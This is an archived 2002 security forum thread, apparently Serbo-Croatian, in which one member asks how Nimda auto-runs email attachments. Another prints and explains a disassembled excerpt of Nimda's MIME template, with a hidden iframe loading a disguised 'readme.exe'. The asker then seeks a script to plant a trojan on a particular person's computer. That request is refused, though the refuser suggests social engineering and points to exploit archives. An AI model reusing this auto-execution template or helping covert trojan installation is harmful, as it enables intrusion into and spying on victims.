Srodne teme
Kliknite za generisanje liste srodnih tema...
Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.

Autoexecution

[es] :: Zaštita :: Autoexecution

[ Pregleda: 5127 | Odgovora: 15 ] > FB > Twit

Postavi temu Odgovori

Autor

Pretraga teme: Traži
Markiranje Štampanje RSS

Krajisnik
Beograd

Član broj: 2306
Poruke: 294
*.beotel.net



Profil

icon Autoexecution03.05.2002. u 01:40 - pre 234 meseci
Nimda Worm npr. radi na foru automatskog pokretanja fajlova. Tj. postoji script koji se nekako spoji sa emailom i on samo pokrene fajl. Meni je malkice poznat taj script ali ne razumem se bas u to. Da li neko zna za taj script, kako se konfigurise, i gde se umece?
Sale_®
 
Odgovor na temu

SEH

Član broj: 2215
Poruke: 94
*.net.hinet.hr



Profil

icon Re: Autoexecution05.05.2002. u 15:44 - pre 234 meseci
Evo ti izvadak iz disasemblirane Nimde:

.data:361790CC nametag db 'Concept Virus(CV) V.5, Copyright(C)2001 R.P.China',0
.data:361790FF align 4
.data:36179100 MIME_header db 'MIME-Version: 1.0',0Dh,0Ah
.data:36179100 ; DATA XREF: sub_0_361767C9+CDo
.data:36179100 ; sub_0_361767C9+D9o
.data:36179100 db 'Content-Type: multipart/related;',0Dh,0Ah
.data:36179100 db 9,'type="multipart/alternative";',0Dh,0Ah
.data:36179100 db 9,'boundary="====_ABC1234567890DEF_===="',0Dh,0Ah
.data:36179100 db 'X-Priority: 3',0Dh,0Ah
.data:36179100 db 'X-MSMail-Priority: Normal',0Dh,0Ah
.data:36179100 db 'X-Unsent: 1',0Dh,0Ah
.data:36179100 db 0Dh,0Ah
.data:36179100 db '--====_ABC1234567890DEF_====',0Dh,0Ah
.data:36179100 db 'Content-Type: multipart/alternative;',0Dh,0Ah
.data:36179100 db 9,'boundary="====_ABC0987654321DEF_===="',0Dh,0Ah
.data:36179100 db 0Dh,0Ah
.data:36179100 db '--====_ABC0987654321DEF_====',0Dh,0Ah
.data:36179100 db 'Content-Type: text/html;',0Dh,0Ah
.data:36179100 db 9,'charset="iso-8859-1"',0Dh,0Ah
.data:36179100 db 'Content-Transfer-Encoding: quoted-printable',0Dh,0Ah
.data:36179100 db 0Dh,0Ah
.data:36179100 db 0Dh,0Ah
.data:36179100 db '<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>',0Dh,0Ah
.data:36179100 db '<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>',0Dh,0Ah
.data:36179100 db '</iframe></BODY></HTML>',0Dh,0Ah
.data:36179100 db '--====_ABC0987654321DEF_====--',0Dh,0Ah
.data:36179100 db 0Dh,0Ah
.data:36179100 db '--====_ABC1234567890DEF_====',0Dh,0Ah
.data:36179100 db 'Content-Type: audio/x-wav;',0Dh,0Ah
.data:36179100 db 9,'name="readme.exe"',0Dh,0Ah
.data:36179100 db 'Content-Transfer-Encoding: base64',0Dh,0Ah
.data:36179100 db 'Content-ID: <EA4DMGBP9p>',0Dh,0Ah
.data:36179100 db 0Dh,0Ah,0

Izgleda bas shitty, potrazi na google plain text verziju. Ono pod jednostrukim navodnicma ti je text poruke. Ono 0Dh,0Ah ti je hexadecimalno 13,10 sto je CRLF (carriage return + line feed) iliti newline. To znaci da tu trebas pritisnuti enter kad budes pretipkavao ovaj kod. Ono 9 ti je ASCII kod za tab. Uoci ove dijelove:

<iframe src=3Dcid:EA4DMGBP9p -> famozni cid

i

Content-Type: audio/x-wav
name="readme.exe" ->jos famozniji readme.exe
Content-Transfer-Encoding: base64 -> base64 enkodirano tijelo crva
Content-ID: <EA4DMGBP9p> ->ovaj ID je isti kao i onaj gore, sto znaci da ce kao 'src' e-mail klijent traziti base64 enkodirani attachment. Naravno, nakon toga Nimda ubaci base64 verziju sebe i posalje ovakvu poruku nekom sretniku koji ima ranjivi Outlook. Ako si ikad primio neku HTML e-mail poruku sa attachmentom (tko nije?), u Outlooku je oznaci, desni klik, Properties->Details->Message Source pa usporedi taj kod sa ovim gore. Ako zelis testirati na sebi, napravi nekoliko e-mail poruka, sejvaj ih kao *.eml i otvori ih u Outlooku.
 
Odgovor na temu

Krajisnik
Beograd

Član broj: 2306
Poruke: 294
*.beotel.net



Profil

icon Re: Autoexecution06.05.2002. u 00:06 - pre 234 meseci
Fino od tebe sto si mi odgovorio ali slabo sam toga razumeo...Naime meni treba samo script koji ce da automatski da pokrene fajl koji je attachovan... Jel mozes ti da napises taj script? Koliko sam razumeo, potrebno je onda samo da snimim taj script kao *.EML i onda da attachujem fajl za njega pod nazivom readme.exe ili kako ga ti vec nazoves u scriptu...Posle toga samo posaljem taj EML... Ako znas to da uradis i nije ti problem, zamolio bih te da mi to uradis...Ako mozes, reci pa cu ti poslati email da mi ga posaljes....
Sale_®
 
Odgovor na temu

SEH

Član broj: 2215
Poruke: 94
*.net.hinet.hr



Profil

icon Re: Autoexecution06.05.2002. u 14:16 - pre 234 meseci
Citat:
Krajisnik:
Fino od tebe sto si mi odgovorio ali slabo sam toga razumeo...Naime meni treba samo script koji ce da automatski da pokrene fajl koji je attachovan... Jel mozes ti da napises taj script? Koliko sam razumeo, potrebno je onda samo da snimim taj script kao *.EML i onda da attachujem fajl za njega pod nazivom readme.exe ili kako ga ti vec nazoves u scriptu...Posle toga samo posaljem taj EML... Ako znas to da uradis i nije ti problem, zamolio bih te da mi to uradis...Ako mozes, reci pa cu ti poslati email da mi ga posaljes....


Nope, necu ja nista raditi ta tebe, a ponajmanje nesto sto ces najvjerojatnije iskoristiti u destruktivne svrhe. Ako zelis primjere, pogledaj arhivu na www.ntbugtraq.com i www.malware.com. Tamo imas dosta primjera sa objasnjenjima i linkovima.
 
Odgovor na temu

Krajisnik
Beograd

Član broj: 2306
Poruke: 294
*.beotel.net



Profil

icon Re: Autoexecution06.05.2002. u 16:29 - pre 234 meseci
Nije u destruktivne svrhe, nego moram da nadjem neki textualni fajl nekom na kompjuteru a to mogu da uradim samo ako mu postavim trojanca. Ali dobro, necu da te uveravam, nego sam samo hteo da pojasnim sliku o mojim motivima.....
Sale_®
 
Odgovor na temu

SEH

Član broj: 2215
Poruke: 94
*.net.hinet.hr



Profil

icon Re: Autoexecution06.05.2002. u 19:37 - pre 234 meseci
Citat:
Krajisnik:
..nego moram da nadjem neki textualni fajl nekom na kompjuteru a to mogu da uradim samo ako mu postavim trojanca...


To je meni destruktivno, sorry :) Pokusaj socijalnim inzenjeringom.
 
Odgovor na temu

Krajisnik
Beograd

Član broj: 2306
Poruke: 294
*.beotel.net



Profil

icon Re: Autoexecution06.05.2002. u 22:29 - pre 234 meseci
Destruktivno je citati text????? Pojasni..... A sta ti znaci ovaj deo sa soc. inzenjeringom???? Ne kapiram ja te fazone...
Sale_®
 
Odgovor na temu

SEH

Član broj: 2215
Poruke: 94
*.net.hinet.hr



Profil

icon Re: Autoexecution07.05.2002. u 16:43 - pre 234 meseci
Citat:
Krajisnik:
Destruktivno je citati text????? Pojasni..... A sta ti znaci ovaj deo sa soc. inzenjeringom???? Ne kapiram ja te fazone...


Meni je destruktivno tebi dati script koji ces ti iskoristiti da nekome uvalis trojana. Soc. inzenjering ti je najbolja metoda ako se pocetnik. Potrebno je samo malo maste jer je 100 puta lakse zajebati covjeka nego komp. Jesi uopce pogledao one linkove gore? Tamo imas full-working primjere.
 
Odgovor na temu

Krajisnik
Beograd

Član broj: 2306
Poruke: 294
*.beotel.net



Profil

icon Re: Autoexecution07.05.2002. u 22:40 - pre 234 meseci
Losu si rec upotrebio(destruktivno), ali necemo vise o tome... Pogledao sam primere i skontao sam da samo umesto njihovog EXEa ubacim moj EXE tako sto prekopiram source i PASTE-ujem ga. Kontas? Ali opet imam par problema... Izgleda da sam patchovao Outlook protiv svih mogucih bugova tako da nijedan od onih primera "ne rade" kod mene... Kako da ga unpatchujem? I drugo pitanje, svi primeri se snimaju kao EML. Pa kako sad nekom da posaljem taj email, a da ga ja prethodno ne otvorim, ali nemoj mi reci da ga stavim kao attachament..
Sale_®
 
Odgovor na temu

SEH

Član broj: 2215
Poruke: 94
*.net.hinet.hr



Profil

icon Re: Autoexecution08.05.2002. u 14:19 - pre 234 meseci
Citat:
Krajisnik:
Pogledao sam primere i skontao sam da samo umesto njihovog EXEa ubacim moj EXE tako sto prekopiram source i PASTE-ujem ga. Kontas? ..


O da, kontam. Takve metode obilato rabe lameri svih vrsta. Mene sad bas briga zasto ce tebi ta skripta i nemam ti vise namjeru uopce pomoci ako ti ne zelis nista nauciti i ako ti je jedina zelja uvaliti tog trojana bez obzira na nacin koji to postici. Na NTbugtraq listi prije ili kasnije (obicno prije) zavrse sve novije rupcage u LookOutu. Ali ne, tamo je samo opisano kako exploitati bug te je naveden primjer u nekoliko linija koda. Onaj koji ga zeli koristiti treba znati javascript, VBS, ActiveX i slicne divote. Za mnoge je to prepreka. Zato sam ti i dao link na www.malware.com da vidis kako inkorporirati bug u e-mail poruku. Ako ne znas, nauci programirati pa ces znati.

Citat:

Ali opet imam par problema... Izgleda da sam patchovao Outlook protiv svih mogucih bugova tako da nijedan od onih primera "ne rade" kod mene... Kako da ga unpatchujem? I drugo pitanje, svi primeri se snimaju kao EML. Pa kako sad nekom da posaljem taj email, a da ga ja prethodno ne otvorim, ali nemoj mi reci da ga stavim kao attachament..


Pa da. Ti si bugovi uglavnom zakrpani u novijim verzijama LookOuta i obicno predstavljaju dokaz koncepta. Ako ga ne zelis otvoriti sa LookOutom, posalji ga preko nekog drugog mail klijenta ili napisi svoga (MAPI je stvarno jednostavan iako sucka).
 
Odgovor na temu

Krajisnik
Beograd

Član broj: 2306
Poruke: 294
*.beotel.net



Profil

icon Re: Autoexecution12.05.2002. u 14:18 - pre 234 meseci
Ne znam da li si dobio mail koji sam ti poslao, posto se nisi javio od tada?
Sale_®
 
Odgovor na temu

Serbian Fighter
Ivan Minic
Decko koji obecava.
Permanently Offline

Član broj: 2583
Poruke: 2316
*.beotel.net

ICQ: 83773127


Profil

icon Re: Autoexecution13.05.2002. u 10:55 - pre 234 meseci
Citat:
P.S. U pitanju je devojka...

Ali ne javlja se ni ona
 
Odgovor na temu

Krajisnik
Beograd

Član broj: 2306
Poruke: 294
*.beotel.net



Profil

icon Re: Autoexecution13.05.2002. u 18:28 - pre 234 meseci
Javili su se oboje, cisto da ti odgovorim na opasku.......
Sale_®
 
Odgovor na temu

Krajisnik
Beograd

Član broj: 2306
Poruke: 294
*.beotel.net



Profil

icon Re: Autoexecution01.06.2002. u 21:32 - pre 233 meseci
Jeli SEH, jel ne znas da uradis ono sto sam te pitao ili sta? Znas li onda barem da napravis onaj mail client sto si ricao koji bi poslao taj moj *.EML file koji bih nekako sklepao?
Sale_®
 
Odgovor na temu

[es] :: Zaštita :: Autoexecution

[ Pregleda: 5127 | Odgovora: 15 ] > FB > Twit

Postavi temu Odgovori

Srodne teme
Kliknite za generisanje liste srodnih tema...
Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.